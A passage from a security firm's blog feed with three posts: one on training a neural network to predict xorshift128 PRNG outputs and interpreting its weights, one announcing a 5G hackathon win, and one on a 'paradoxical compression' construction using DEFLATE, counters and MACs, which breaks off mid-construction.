
Cracking Random Number Generators using Machine Learning – Part 1: xorshift128

15 October 2021 at 17:29

Outline

  1. Introduction
  2. How does xorshift128 PRNG work?
  3. Neural Networks and XOR gates
  4. Using Neural Networks to model the xorshift128 PRNG
  5. Creating a machine-learning-resistant version of xorshift128
  6. Conclusion

1. Introduction

This blog post proposes an approach to crack Pseudo-Random Number Generators (PRNGs) using machine learning. By cracking, we mean that we can predict the sequence of the random numbers using previously generated numbers, without knowledge of the seed. We started by breaking a simple PRNG, namely xorshift128, following the lead of the post published in [1]. We simplified the structure of the neural network model from the one proposed in that post, and we achieved higher accuracy. This blog aims to show how to train a machine learning model that can reach 100% accuracy in predicting the generated numbers without knowing the seed. We also deep dive into the trained model to show how it works and to extract useful information from it.

In the mentioned blog post [1], the author replicated the xorshift128 PRNG sequence with high accuracy, without having the PRNG seed, using a deep learning model. After training, the model can use any four consecutive generated numbers to replicate the same sequence of the PRNG with a bitwise accuracy greater than 95%. The details of this experiment’s implementation and the best-trained model can be found in [2].

At first glance, this seemed a bit counter-intuitive, as the whole idea behind machine learning algorithms is to learn from the patterns in the data to perform a specific task, whether through supervised, unsupervised, or reinforcement learning. Pseudo-random number generators, on the other hand, are designed to generate random sequences, and hence these sequences should not follow any pattern. So, it did not make any sense (at the beginning) to train an ML model, which learns from data patterns, on a PRNG that should not follow any pattern. Not only did the model learn, but it also reached 95% bitwise accuracy, which means that it generates the PRNG’s exact output and, on average, gets fewer than two bits wrong. So, how is this possible? And why can machine learning crack the PRNG? Can we even do better than 95% bitwise accuracy? That is what we are going to discuss in the rest of this article. Let’s start by examining the xorshift128 algorithm.

** Editor’s Note: How does this relate to security? While this research looks at a non-cryptographic PRNG, we are interested, generically, in understanding how deep learning-based approaches to finding latent patterns within functions presumed to be generating random output could work, as a prerequisite to attempting to use deep learning to find previously-unknown patterns in cryptographic (P)RNGs, as this could potentially serve as an interesting supplementary method for cryptanalysis of these functions. Here, we show our work in beginning to explore this space. **

2. How does xorshift128 PRNG work?

To understand whether machine learning (ML) could crack the xorshift128 PRNG, we need to comprehend how it works and check whether it follows any patterns. Let’s start by digging into the implementation of the xorshift128 algorithm to learn how it works. The code implementation of this algorithm can be found on Wikipedia and is shared in [2]. Here is the function that was used in the repo to generate the PRNG sequence (which is used to train the ML model):

def xorshift128():
    '''xorshift
    https://ja.wikipedia.org/wiki/Xorshift
    '''

    x = 123456789
    y = 362436069
    z = 521288629
    w = 88675123

    def _random():
        nonlocal x, y, z, w
        t = x ^ ((x << 11) & 0xFFFFFFFF)  # 32bit
        x, y, z = y, z, w
        w = (w ^ (w >> 19)) ^ (t ^ (t >> 8))
        return w

    return _random

As we can see from the code, the implementation is straightforward. It has four internal numbers, x, y, z, and w, representing the seed and the state of the PRNG at the same time. Of course, we can update this generator implementation to provide the seed with a different function call instead of hardcoding it. Every time we call the generator, it shifts the internal variables as follows: y → x, z → y, and w → z. The new value of w is evaluated by applying some bit manipulations (shifts and XORs) to the old values of x and w. The new w is then returned as the new random number output of the generator. Let’s call the function output o.

Using this code, we can derive the logical expression of each bit of the output, which leads us to the following representations of the output bits of o:

O0 = W0 ^ W19 ^ X0 ^ X8

O1 = W1 ^ W20 ^ X1 ^ X9

...

O31 = W31 ^ X20 ^ X31

where Oi is the ith bit of the output, and the sign ^ is a bitwise XOR. The schematic diagram of this algorithm is shown below:

We can notice from this algorithm that we only need w and x to generate the next random number output. Of course, we need y and z to generate the random numbers afterward, but the value of o depends only on x and w.

So after understanding the algorithm, we can see the simple relation between the last four generated numbers and the next one. Hence, if we know the last four generated numbers from this PRNG, we can use the algorithm to generate the whole sequence; this could be the main reason why this algorithm is not cryptographically secure. Although the algorithm-generated numbers seem to be random with no clear relations between them, an attacker with the knowledge of the algorithm can predict the whole sequence of xorshift128 using any four consecutive generated numbers. As the purpose of this post is to show how an ML model can learn the hidden relations in a sample PRNG, we will assume that we only know that there is some relation between the newly generated number and its last four ones without knowing the implementation of the algorithm.
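Before involving any ML, this relation can be checked directly in code. Here is a minimal Python sketch (reusing the xorshift128() generator above; the helper name is ours) showing that any four consecutive outputs fully determine the next one:

def predict_next(o1, o2, o3, o4):
    # After emitting o1..o4 (oldest first), the internal state is exactly
    # (x, y, z, w) = (o1, o2, o3, o4), so the next output needs only o1 and o4.
    x, w = o1, o4
    t = (x ^ (x << 11)) & 0xFFFFFFFF
    return (w ^ (w >> 19)) ^ (t ^ (t >> 8))

rand = xorshift128()
outputs = [rand() for _ in range(5)]
assert predict_next(*outputs[:4]) == outputs[4]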

Returning to the main question: can machine learning algorithms learn to generate the xorshift128 PRNG sequence without knowing its implementation, using only the last four generated numbers?

To answer this question, let’s first introduce the Artificial Neural Networks (ANN or NN for short) and how they may model the XOR gates.

3. Neural Networks and XOR gates

Neural Networks (NN), aka Multi-Layer Perceptrons (MLP), are one of the most commonly used machine learning algorithms. They consist of small computing units, called neurons or perceptrons, organized into sets of mutually unconnected neurons, called layers. The layers are interconnected to form paths from the inputs of the NN to its outputs. The following figure shows a simple example of a two-layer NN (the input layer is not counted). The details of the mathematical formulation of NNs are out of the scope of this article.

While the NN is being trained on the input data, the connections between the neurons, aka the weights, either get stronger (large positive or negative values) to represent a strongly positive/negative connection between two neurons, or get weaker (close to 0) to represent the absence of a connection. At the end of the training, these connections/weights encode the knowledge stored in the NN model.

One example used to describe how NNs handle nonlinear data is the use of an NN to model a two-input XOR gate. The main reason for choosing the two-input XOR function is that, although it is simple, its outputs are not linearly separable [3]. Hence, using an NN with two layers is the best way to represent this gate. The following figure (from the Abhranil blog [3]) shows how we can use a two-layer neural network to imitate a two-input XOR. The numbers on the lines are the weights, and the numbers inside the nodes are the thresholds (negative biases), assuming a step activation function.
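As an illustration, here is a minimal numpy sketch of such a two-layer XOR network, with hand-picked weights and a step activation; these weights are one possible choice, not necessarily the ones from the figure:

import numpy as np

def step(v):
    return (v >= 0).astype(int)

W1 = np.array([[1.0, 1.0],    # OR-like hidden unit
               [1.0, 1.0]])   # AND-like hidden unit
b1 = np.array([-0.5, -1.5])   # thresholds (negative biases)
W2 = np.array([1.0, -1.0])    # output unit: OR AND NOT AND
b2 = -0.5

def xor(a, b):
    hidden = step(W1 @ np.array([a, b]) + b1)
    return int(step(W2 @ hidden + b2))

assert [xor(0, 0), xor(0, 1), xor(1, 0), xor(1, 1)] == [0, 1, 1, 0]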

If we have more than two inputs to the XOR, we will need to increase the number of nodes in the hidden layer (the layer in the middle) to make it possible to represent the other components of the XOR.

4. Using Neural Networks to model the xorshift128 PRNG

Based on what we discussed in the previous section and our understanding of how the xorshift128 PRNG algorithm works, it makes sense now that ML can learn the patterns the xorshift128 PRNG algorithm follows. We can also now decide how to structure the neural network model to replicate the xorshift128 PRNG algorithm. More specifically, we will use a dense neural network with only one hidden layer, as that is all we need to represent any set of XOR functions as implemented in the xorshift128 algorithm. Contrary to the model suggested in [1], we don’t see any reason to use a complex model like an LSTM (“Long short-term memory,” a type of recurrent neural network), especially since all output bits are directly connected to sets of the input bits through XOR functions, as we have shown earlier, and there is no need to preserve internal state, as is done in the LSTM.

4.1 Neural Network Model Design 

Our proposed model has 128 inputs in the input layer, representing the last four generated 32-bit integers, and 32 outputs in the output layer, representing the next 32-bit generated random number. The main hyperparameter we need to decide on is the number of neurons/nodes in the hidden layer. We don’t want too few nodes, which could not represent all the terms of the XOR functions, and at the same time we don’t want a vast number of nodes that would go unused, complicate the model, and increase the training time. In this case, based on the number of inputs, outputs, and the complexity of the XOR functions, we made an educated guess and used 1024 nodes for the hidden layer. Hence, our neural network structure is as follows (the input layer is ignored):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 1024)              132096    
_________________________________________________________________
dense_1 (Dense)              (None, 32)                32800     
=================================================================
Total params: 164,896
Trainable params: 164,896
Non-trainable params: 0
_________________________________________________________________

As we can see, the number of parameters (weights and biases) of the hidden layer is 132,096 (128×1024 weights + 1024 biases), and the number of parameters of the output layer is 32,800 (1024×32 weights + 32 biases), which comes to a total of 164,896 parameters to train. Compare this to the model used in [1]:

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
lstm (LSTM)                  (None, 1024)              4329472   
_________________________________________________________________
dense (Dense)                (None, 512)               524800    
_________________________________________________________________
dense_1 (Dense)              (None, 512)               262656    
_________________________________________________________________
dense_2 (Dense)              (None, 512)               262656    
_________________________________________________________________
dense_3 (Dense)              (None, 512)               262656    
_________________________________________________________________
dense_4 (Dense)              (None, 512)               262656    
_________________________________________________________________
dense_5 (Dense)              (None, 32)                16416     
=================================================================
Total params: 5,921,312
Trainable params: 5,921,312
Non-trainable params: 0
_________________________________________________________________

This complex model has around 6 million parameters to train, which makes the training harder and much more time-consuming to get good results. It could also easily get stuck in one of the local minima of that huge 6-million-dimensional space. Additionally, storing this model and serving it later would use 36 times the space needed to store/serve our model. Furthermore, the number of model parameters affects the amount of data required to train the model: the more parameters, the more input data is needed.

Another issue with that model is the loss function used. Our target is to get as many correct bits as possible; hence, the most suitable loss function in this case is “binary_crossentropy,” not “mse.” Without getting into the math of these two loss functions, it is sufficient to say that we don’t care whether the output is 0.8, 0.9, or even 100. All we care about is whether the value crosses some threshold, to be considered one, or not, to be considered zero. Another non-optimal parameter choice in that model is the activation function of the output layer. As the output layer comprises 32 neurons, each representing a bit whose value should always be 0 or 1, the most appropriate activation function for these types of nodes is usually a sigmoid function. In contrast, that model uses a linear activation function, which outputs any value from -inf to inf. Of course, we can threshold those values to convert them to zeros and ones, but training that model will be more challenging and take more time.

For the rest of the hyperparameters, we have used the same values as the model in [1]. Also, we used the same input sample as the other model, which consists of around 2 million random numbers sampled from the above PRNG function for training, and 10,000 random numbers for testing. The training and testing random number samples are formed into quadruples of consecutive random numbers to be used as inputs to the model, with the next random number used as the desired output. It is worth mentioning that we don’t think we need that amount of data to reach the performance we reached; we just tried to be consistent with the referenced article. Later, we can experiment to determine the minimum data size sufficient to produce a well-trained model. The following table summarizes the model parameters/hyperparameters of our model in comparison with the model proposed in [1]:

                        NN Model in [1]                        Our Model
Model Type              LSTM and Dense Network                 Dense Network
#Layers                 7                                      2
#Neurons                1024 LSTM + 2592 Dense                 1056 Dense
#Trainable Parameters   5,921,312                              164,896
                        (4,329,472 only from the LSTM layer)
Activation Functions    Hidden Layers: relu                    Hidden Layer: relu
                        Output Layer: linear                   Output Layer: sigmoid
Loss Function           mse                                    binary_crossentropy

Comparison between our proposed model and the model from the post in [1]
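For concreteness, the right-hand column of the table above can be written in a few lines of Keras. This is a hedged sketch of the described architecture; the optimizer is our assumption, as it is not restated here:

from tensorflow import keras

model = keras.Sequential([
    keras.layers.Dense(1024, activation='relu', input_shape=(128,)),  # hidden layer
    keras.layers.Dense(32, activation='sigmoid'),                     # one sigmoid per output bit
])
model.compile(optimizer='adam',                # assumption: optimizer not specified above
              loss='binary_crossentropy',
              metrics=['binary_accuracy'])     # bitwise accuracy
model.summary()                                # matches the 164,896-parameter summary above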

4.2 Model Results

After a few hours of model training and optimizing the hyperparameters, the NN model achieved 100% bitwise training accuracy! Of course, we ran the test set through the model, and we got the same result of 100% bitwise accuracy. To be more confident about what we had achieved, we generated a new sample of 100,000 random numbers with a different seed than the one used to generate the previous data, and we got the same result of 100% bitwise accuracy. It is worth mentioning that although the referenced article achieved 95%+ bitwise accuracy, which looks like a promising result, when we evaluated the model accuracy (versus bitwise accuracy), i.e., its ability to generate the exact next random number without any bits flipped, we found that the model’s accuracy dropped to around 26%. Our model, by comparison, has 100% accuracy. The 95%+ bitwise accuracy does not mean failing on only 2 bits, as it may appear (5% of 32 bits is less than 2 bits); rather, these 5% errors are scattered across 14 bits. In other words, although the referenced model has a bitwise accuracy of 95%+, only 18 bits are always 100% correct, and on average, 2 bits out of the remaining 14 are altered by the model.

The following table summarizes the two model comparisons:

                                    NN Model in [1]   Our Model
Bitwise Accuracy                    95%+              100%
Accuracy                            26%               100%
Bits could be Flipped (out of 32)   14                0

Models accuracy comparison

In machine learning, getting 100% accuracy is usually bad news. It normally means either that we don’t have a good representation of the whole dataset, that we are overfitting the model to the sample data, or that the problem is deterministic and does not need machine learning. In our case, it is close to the third option. The xorshift128 PRNG algorithm is deterministic: we need to learn which input bits are used to generate each output bit, but the function connecting them, XOR, is already known. So, in a way, this algorithm is easy for machine learning to crack. Hence, for this problem, getting a 100% accurate model means that the ML model has learned the bit-connection mappings between the input and output bits. So, if we get any four consecutive numbers generated from this algorithm, the model will generate the exact same sequence of random numbers as the algorithm, without knowing the seed.

4.3 Model Deep Dive

This section will deep dive into the model to understand what it has learned from the PRNG data and whether it matches our expectations.

4.3.1 Model First Layer Connections

As discussed in section 2, the xorshift128 PRNG uses the last four generated numbers to generate the new random number. More specifically, the implementation of xorshift128 PRNG only uses the first and last numbers of the four, called x and w, to generate the new random number, o. So, we want to check the weights that connect the 128 inputs (the last four generated numbers, merged) from the input layer to the 1024 nodes of the hidden layer in our trained model, to see how strongly they are connected and hence verify which bits are used to generate the outputs. The following figure shows the value of the weights (on the y-axis) connecting each input (on the x-axis) to the 1024 hidden nodes. In other words, each dot on the graph represents the weight from one of the hidden nodes to the input on the x-axis:

As we can see, for each input, very few of the hidden nodes are strongly connected to it, with weights greater than ~2.5 or less than ~-2.5. The rest of the nodes, with low weights between -2 and 2, can be considered not connected. We can also notice that the inputs between bit 32 and bit 95 are not connected to any hidden node. This is because, as we stated earlier, the implementation of xorshift128 PRNG only uses x (bits 0 to 31) and w (bits 96 to 127) from the inputs; the other two inputs, y and z, representing bits 32 to 95, are not used to generate the output, and that is exactly what the model has learned. This implies that the model has learned this pattern accurately from the data given in the training phase.
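For reference, this observation can be scripted directly against the trained model’s first-layer weights; the sketch below assumes the Keras model object from earlier, and the ~2 cut-off mirrors the observation above:

import numpy as np

W1, b1 = model.layers[0].get_weights()    # W1 has shape (128, 1024)

# Inputs whose strongest absolute weight stays below ~2 are effectively
# unused; we expect this to cover bits 32..95 (the y and z words).
unused = np.where(np.abs(W1).max(axis=1) < 2)[0]
print(unused)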

4.3.2 Model Output Parsing

Similar to what we did in the previous section, the following figure shows the weights connecting each output (on the x-axis) to the 1024 hidden nodes of the hidden layer:

Like our previous observation, each output bit is connected to only a very few nodes from the hidden layer, except perhaps bit 11, which is less decisive and may need more training to be less error-prone. What we want to examine now is how these output bits are connected to the input bits. We will explore only the first bit here, but the rest can be done the same way. If we focus only on bit 0 in the figure, we can see that it is connected to only five nodes from the hidden layer, two with positive weights and three with negative weights, as shown below:

Those connected hidden nodes are 120, 344, 395, 553, and 788. Although these nodes look random, if we plot their connection to the inputs, we get the following figure:

As we can see, very few bits affect those hidden nodes, which we circled in the figure. They are bits 0, 8, 96, and 115, which, taken modulo 32, correspond to bits 0 and 8 of the first number, x, and bits 0 and 19 of the fourth number, w. This matches the xorshift128 PRNG function we derived in section 2: the first bit of the output is the XOR of these bits, O0 = W0 ^ W19 ^ X0 ^ X8. We expect the five hidden nodes together with the one output node to resemble the functionality of an XOR of these four input bits. Hence, the ML model can learn the XOR function of any set of arbitrary input bits if given enough training data.
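The whole tracing described above can also be automated against the model’s two weight matrices; the ±2 threshold is our assumption:

import numpy as np

W1, _ = model.layers[0].get_weights()     # (128, 1024): inputs to hidden nodes
W2, _ = model.layers[1].get_weights()     # (1024, 32): hidden nodes to outputs

bit = 0
hidden_nodes = np.where(np.abs(W2[:, bit]) > 2)[0]    # e.g. 120, 344, 395, 553, 788
for h in hidden_nodes:
    input_bits = np.where(np.abs(W1[:, h]) > 2)[0]    # e.g. 0, 8, 96, 115
    print(h, input_bits, input_bits % 32)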

5. Creating a machine-learning-resistant version of xorshift128

After analyzing how the xorshift128 PRNG works and how NN can easily crack it, we can suggest a simple update to the algorithm, making it much harder to break using ML. The idea is to introduce another variable in the seed that will decide:

  1. Which variables to use out of x, y, z, and w to generate o.
  2. How many bits to shift each of these variables.
  3. Which direction to shift these variables, either left or right.

This can be binary encoded in less than 32 bits. For example, only the w and x variables generate the output in the sample code shown earlier, which can be binary encoded as 1001. The variable w is shifted 19 bits to the right, which can be binary encoded as 100110, where the least significant bit, 0, represents the right direction. The variable x is shifted 11 bits to the left, which can be binary encoded as 010111, where the least significant bit, 1, represents the left direction. This representation takes 4 bits + 4×6 bits = 28 bits. Of course, we need to make sure that the 4 bits that select the variables do not take the values 0000, 0001, 0010, 0100, or 1000, as they would select no variable, or only one, to XOR.

Using this simple update adds a small amount of complexity to the PRNG algorithm’s implementation, yet it makes an ML model learn only one possible sequence out of about 16 million different sequences that the same algorithm can generate with different seeds. It would be as if the ML had only learned the seed of the algorithm, not the algorithm itself. Please note that the purpose of this update is to make the algorithm more resilient to ML attacks; the other properties of the resulting PRNG, such as periodicity, are yet to be studied.
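Below is a hedged Python sketch of this parameterized variant, keeping the structure of the original generator. The bit layout of the extra seed word and the way shifted values are combined are our assumptions, following the encoding described above (and using a single shift per variable, unlike the original’s double shift of t):

def xorshift128_param(select, shift_codes):
    '''select: 4-bit mask choosing among (x, y, z, w); shift_codes: four 6-bit
    values, 5 bits of shift amount plus a direction bit (1 = left, 0 = right).'''
    state = [123456789, 362436069, 521288629, 88675123]   # x, y, z, w

    def _shift(v, code):
        amount, left = code >> 1, code & 1
        return ((v << amount) if left else (v >> amount)) & 0xFFFFFFFF

    def _random():
        o = 0
        for i in range(4):
            if select & (1 << (3 - i)):       # bit 3 selects x ... bit 0 selects w
                o ^= state[i] ^ _shift(state[i], shift_codes[i])
        state[:] = state[1:] + [o]            # y -> x, z -> y, w -> z, o -> w
        return o

    return _random

# Mimicking the original choices: use x and w (1001), shift x left by 11
# (010111) and w right by 19 (100110).
rng = xorshift128_param(0b1001, [0b010111, 0, 0, 0b100110])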

6. Conclusion

This post discussed how the xorshift128 PRNG works and how to build a machine learning model that can learn from the PRNG’s “randomly” generated numbers to predict them with 100% accuracy. This means that if the ML model gets access to any four consecutive numbers generated from this PRNG, it can generate the exact same sequence without having access to the seed. We also studied how to design an NN model that best represents this PRNG. Here are some of the lessons learned from this article:

  1. Although the xorshift128 PRNG may appear to humans not to follow any pattern, machine learning can be used to predict the algorithm’s outputs, as the PRNG still follows a hidden pattern.
  2. Applying deep learning to predict PRNG output requires understanding of the specific underlying algorithm’s design.
  3. It is not necessarily the case that large and complicated machine learning models attain higher accuracy than simple ones.
  4. Simple neural network (NN) models can easily learn the XOR function.

The Python code for training and testing the model outlined in this post is shared in this repo in the form of a Jupyter notebook. Please note that this code is based on an old version of the code shared in the post in [1], with the changes explained in this post. This was done intentionally to keep the same data and other parameters unchanged, for a fair comparison.

Acknowledgment

I would like to thank my colleagues in NCC Group for their help and support and for giving valuable feedback, especially on the crypto/cybersecurity parts. Here are a few names that I would like to thank explicitly: Ollie Whitehouse, Jennifer Fernick, Chris Anley, Thomas Pornin, Eric Schorn, and Marie-Sarah Lacharite.

References

[1] Everyone Talks About Insecure Randomness, But Nobody Does Anything About It

[2] The code implementation repository for [1]

[3] https://blog.abhranil.net/2015/03/03/training-neural-networks-with-genetic-algorithms/

NCC Group placed first in global 5G Cyber Security Hack competition

14 October 2021 at 09:00

In June of this year, Traficom – the Finnish transport and communications agency – along with Aalto University, Cisco, Ericsson, Nokia, and PwC, organized the 5G Cyber Security Hack competition. This hackathon-style event was a follow-up to a similar, successful event organised in November 2019 in Oulu, Finland. Due to Covid restrictions, this year’s event was fully remote, which made it easier for a larger pool of security experts to take part. As in 2019, there were four interesting hacking challenges relating to 5G technology and its use cases. The NCC Group team participated in the 2019 event and finished in second place in the Ericsson challenge, so we were eager to take on this year’s challenge. A large number of participants took part in the event this year, with around 130 security experts from around the world; teams were invited to participate by application only.

This year, NCC Group consultants, Ross Bradley, Eva Esteban Molina, Phil Marsden and Mark Tedman took part in the Ericsson “Hack the Crown Jewels” challenge, for which they won first prize.

5G networks offer greater connectivity and faster wireless broadband and are now being rolled out over a large proportion of the world, with more than 250 million subscribers worldwide. With that comes an exponential increase in 5G speed and capacity, and there has been a decisive shift in technology development, pushing new capability from home networks to critical national infrastructures, all using 5G equipment. The security of 5G networks is now high on the agenda of many operators, vendors, and governments, and excellent events like the 5G Cyber Security hackathon highlight the ongoing work to help secure these networks.

This Hack challenge offered hackers four real-life use cases for 5G to work on – a Cisco CTF challenge on a staged 5G network, a 5G Ericsson Packet Core Gateway, Nokia’s edge data center system and PwC/Aalto University’s 5G testbed.

The Hack is admittedly fun, but it isn’t just for fun – these kinds of activities play a crucial part in the iterative design and engineering process that network equipment manufacturers use to ensure the security and safety of users. Each company putting forward a use case for hacking also offered up bug bounty prize money, shared among the best hackers/teams, as one mechanism for helping vendors find and remediate security risks in their systems before threat actors can exploit them.

The 5G Packet Core Gateway challenge

The details of the overall event, including the findings of individual challenges, are subject to non-disclosure agreements, but the exercise itself was a great demonstration of our Telecommunications Practice’s capability. The 5G Ericsson Packet Core Gateway is a key part of the mobile 5G core infrastructure, and it is essential that all vendors understand how vulnerabilities and security risks within it could be exploited by an attacker. We dedicated our time to the Ericsson challenge, which focused on finding security weaknesses in the backbone of the mobile 5G core infrastructure – the Packet Core Gateway.

The hackathon started with an introduction on Friday evening, with challenges opening up to competitors at 8pm. Hacking continued all weekend until 11am on the Sunday morning. Our findings were shared with the Ericsson team throughout the competition, with final findings submitted before the 11am Sunday deadline. Prizes were awarded on the Sunday afternoon, at which point it was revealed we had won the Ericsson challenge (and come second in the team photo)! The event was well run by the Ericsson team and the event organisers, and we look forward to participating in any future events.

About NCC Group’s Telecommunications Practice

This competition is just one of the many ways that NCC Group is actively improving the security of 5G infrastructure. In addition to our 5G security research (some of which is published on this blog), we regularly work closely with network equipment manufacturers and operators alike, including through paid consulting engagements. We conduct regular security reviews of 5G core and RAN equipment, with specialist researchers and consultants skilled in everything from reverse engineering and hardware reviews to detailed high level threat assessments.

Paradoxical Compression with Verifiable Delay Functions

13 October 2021 at 10:00

We present here a new construction which has no real immediate usefulness, but is a good illustration of a fundamental concept of cryptography, namely that there is a great difference between knowing that some mathematical object exists, and being able to build it in practice. Thus, this construction can be thought of as having some educational virtue, in the spirit of the mathematical recreations that have been a favourite pastime of mathematicians since at least the early 17th century.

We call paradoxical compression a lossless compression algorithm such that:

  • On any input x (a sequence of bits), it produces an output C(x) (another sequence of bits) such that the original x can be rebuilt from C(x) (the compression is lossless).
  • There is at least one input x0 such that C(x0) is strictly shorter than x0 (the algorithm really deserves to be called a compression algorithm).
  • The input size is never increased: for all x, C(x) is never strictly longer than x.

This is mathematically impossible. There is no compression algorithm that can achieve these three properties simultaneously. Despite this impossibility, we can achieve it in practice. A paper describing the algorithm, and a demo implementation, are available at:
https://github.com/pornin/paradox-compress

The paper is also available on eprint.

A Few Important Warnings

  • This is not “infinite compression”. We are not talking about a compression algorithm that could reduce the size of every possible input. That would be very useful indeed, but it is impossible, and, so to speak, a lot more impossible than paradoxical compression. We merely claim that the output is not larger than the input, not that it is always shorter.
  • Both paradoxical and infinite compression have been “achieved” by various people when working on files by moving some information into the file metadata (file name, date of creation or last modification…). We are not dealing here with such tricks; our inputs and outputs are generic sequences of bits, that do not have any metadata.

On the Impossibility of Paradoxical Compression

Let x0 be an input which is reduced by the compression algorithm. For instance, suppose that x0 has length 1000 bits, but C(x0) has length 900 bits. For the compression algorithm to deserve that name, such an input must exist.

There are exactly 2^901-1 possible bit sequences of up to 900 bits. Every one of them should be compressible into another bit sequence of up to 900 bits. Thus, all 2^901-1 bit sequences are mapped to bit sequences in the same set. But the mapping must be injective: if two bit sequences are mapped to the same output, then that output cannot be reliably decompressed, since there would be two corresponding inputs. The hypothesis of losslessness forbids that situation. Therefore, all 2^901-1 bit sequences of length up to 900 bits are mapped by the compression algorithm to 2^901-1 distinct bit sequences of length up to 900 bits. This necessarily exhausts all of them, in particular C(x0). This implies that the compression of x0 produces an output which is also the result of compressing another input x1 distinct from x0 (since x1 has length at most 900 bits, while x0 has length 1000 bits). This is a contradiction: the compression algorithm cannot be lossless.

This simple demonstration is an application of what is now known as the pigeonhole principle, a well-known remark that can be expressed in set theory as follows: there cannot be an injective mapping from a finite set S1 to a finite set S2 if the cardinality of S2 is strictly lower than the cardinality of S1. In the early 17th century, the French Jesuit Jean Leurechon used it to explain that there are necessarily at least two men in the world with the same number of hairs, since there are more men in the world than hairs on the head of any single man. The principle was restated several times over the centuries, with various metaphors, one of the most recent involving pigeons in a dovecote.

In the context of paradoxical compression, the pigeonhole principle basically means that there must exist a “problematic input” x that breaks one of the alleged properties: either C(x) is larger than x, or decompression of C(x) does not yield x back, or the compression or decompression algorithm fails to terminate.

Achieving Paradoxical Compression

Since we know that paradoxical compression is impossible, achieving it nonetheless is going to require some creativity. In other words, we will “cheat”. The conceptual trick here is the following: there exist some “problematic inputs”, but there are not necessarily many of them. Maybe we can arrange for them to be hard to find? In essence, we are moving the target: we won’t make an algorithm that can be proven to always work, but we might make one such that nobody can find a problematic input (even though everybody knows that these problematic inputs necessarily exist).

This is where the gist of the trick lies: there is an existence proof for problematic inputs, but this is not a constructive proof, since it only demonstrates that such inputs must exist; it does not reveal them. In the world of mathematics, existence proofs are enough to conclude; but in the world of computers, which operate under finite resources, constructive proofs do not automatically follow. Most of cryptography thrives in the gap between existence and constructive proofs. For instance, given a strong, cryptographically secure hash function such as SHA-256, we know perfectly well that collisions must exist (the SHA-256 input space is vastly larger than the SHA-256 output space, so the SHA-256 function cannot be injective), but nobody has ever managed to find one. We can even describe algorithms that would produce collisions if executed, but at a computational cost that far exceeds our available resources, so we cannot do that in practice.

In the case of paradoxical compression, the construction can be described as successive improvements. Let’s start with a “normal” compression algorithm such as DEFLATE (the core algorithm in the GZip and Zlib formats, also used in traditional Zip archives). This algorithm can reduce the size of some sequences of bits, in particular structured data commonly encountered in practical applications. However, for most possible inputs (e.g. output of a random generator), it will slightly increase the size. We want to fix that. A simple method is the following:

  • Compression: if DEFLATE(x) is shorter than x, then return DEFLATE(x). Otherwise, return x.
  • Decompression: if y can be inflated into x, then return x. Otherwise, return y.

This method assumes that a “compressed output” can be unambiguously distinguished from any other sequence of bits. This is, of course, not true, and it is easy to make this algorithm fail by applying the compressor to its own output: for a given x, C(x) is usually not itself compressible (after all, DEFLATE does a good job of removing the redundancies that DEFLATE itself leverages), so that C(C(x)) will return C(x) itself. Then, decompression of C(C(x)) will return x instead of C(x). C(x) is thus a “problematic input,” since it does not survive a compression-decompression cycle.
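The failure is easy to reproduce. Here is a minimal Python sketch of that naive scheme, with zlib standing in for DEFLATE:

import zlib

def compress(x: bytes) -> bytes:
    d = zlib.compress(x)
    return d if len(d) < len(x) else x

def decompress(y: bytes) -> bytes:
    try:
        return zlib.decompress(y)
    except zlib.error:
        return y

x = b'A' * 1000
c = compress(x)                        # compressible input: c is shorter than x
assert decompress(c) == x              # round-trips fine
assert decompress(compress(c)) != c    # but c itself does not survive the cycle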

Now, we can handle that case by adjoining a counter in some sort of header. Compressed outputs will start with a counter of 0. If the input to the compression algorithm is already a compressed output, we’ll just increase the counter; the counter is really the number of nested invocations of the compression algorithm. This leads to the following:

  • Compression of x:
    • If DEFLATE(x) is shorter than x with some extra room for our counter (say, a 32-bit counter), then return DEFLATE(x) || 0.
    • Otherwise, if the input is itself x = DEFLATE(x’) || c for some input x’ and counter c, then return DEFLATE(x’) || c+1.
    • Otherwise, return x.
  • Decompression of y:
    • If y = DEFLATE(x) || 0 for some x, then return x.
    • Otherwise, if y = DEFLATE(x) || c from some input x and counter c > 0, then return DEFLATE(x) || c-1.
    • Otherwise, return y.

Does this work? Mostly. If you implement it and try it on some examples, including by trying to compress a compression output, it seems to work. However, the problematic inputs are not unreachable. It can be shown that the above necessarily works except in a single place: the computation of c+1 in the second compression case. Since the counter slot has a fixed length, it may overflow. For instance, if the counter is a 32-bit integer, and c happens to be equal to 2^32-1, then c+1 does not fit. The compression algorithm would typically truncate the value to its low 32 bits, yielding 0, and decompression would not return the proper bit sequence. In other words, the “problematic inputs” are exactly the values DEFLATE(x) || 0xFFFFFFFF. You might take solace in the idea that such an input is unlikely to occur in practical, non-adversarial situations, but it is still easy enough to build. Thus, this is not good enough for us. We want a construction that cannot be broken even by someone actively trying to find a problematic input.

Note, though, that building a problematic input by compressing the output repeatedly is very inefficient; with a 32-bit counter, it takes more than 4 billion recursive calls. Of course, if you want to make a problematic input on purpose, you don’t do that; you directly set the counter to the all-ones value. But what if you can’t?

Let’s now suppose that the compression and decompression algorithms are really compression and decompression systems that can be invoked, but which are opaque to attackers (this is called the “blackbox model”). In that case, we may imagine that the compressor somehow signs its outputs, so that attackers who want to make a problematic input cannot directly set the counter to the all-ones value; if the attacker must use the compression system to increase the counter, then reaching a counter overflow would require an inordinately large number of invocations. If the counter is large enough (e.g. 64 bits or more), then the compression system cannot do that in any practical time. This leads us to the following construction (a code sketch follows the list):

  • The compression and decompression system are assumed to share a secret key K. That key is used in a message authentication code (MAC). The MAC is supposed to be stateless, deterministic and unforgeable; in practice, consider it to be HMAC/SHA-256, possibly with an output truncated to 128 bits.
  • Compression of x:
    • If DEFLATE(x) is shorter than x by at least 64+128 = 192 bits, then return DEFLATE(x) || 0 || MAC(DEFLATE(x) || 0) (i.e. the concatenation of DEFLATE(x), the counter value 0 over 64 bits, and a 128-bit MAC computed over these two elements).
    • Otherwise, if the input is x = DEFLATE(x’) || c || MAC(DEFLATE(x’) || c) for some input x’ and counter c, then return DEFLATE(x’) || c+1 || MAC(DEFLATE(x’) || c+1).
    • Otherwise, return x.
  • Decompression of y:
    • If y = DEFLATE(x) || 0 || MAC(DEFLATE(x) || 0) for some input x, then return x.
    • Otherwise, if y = DEFLATE(x) || c || MAC(DEFLATE(x) || c) for some input x and counter c > 0, then return DEFLATE(x) || c-1 || MAC(DEFLATE(x) || c-1).
    • Otherwise, return y.
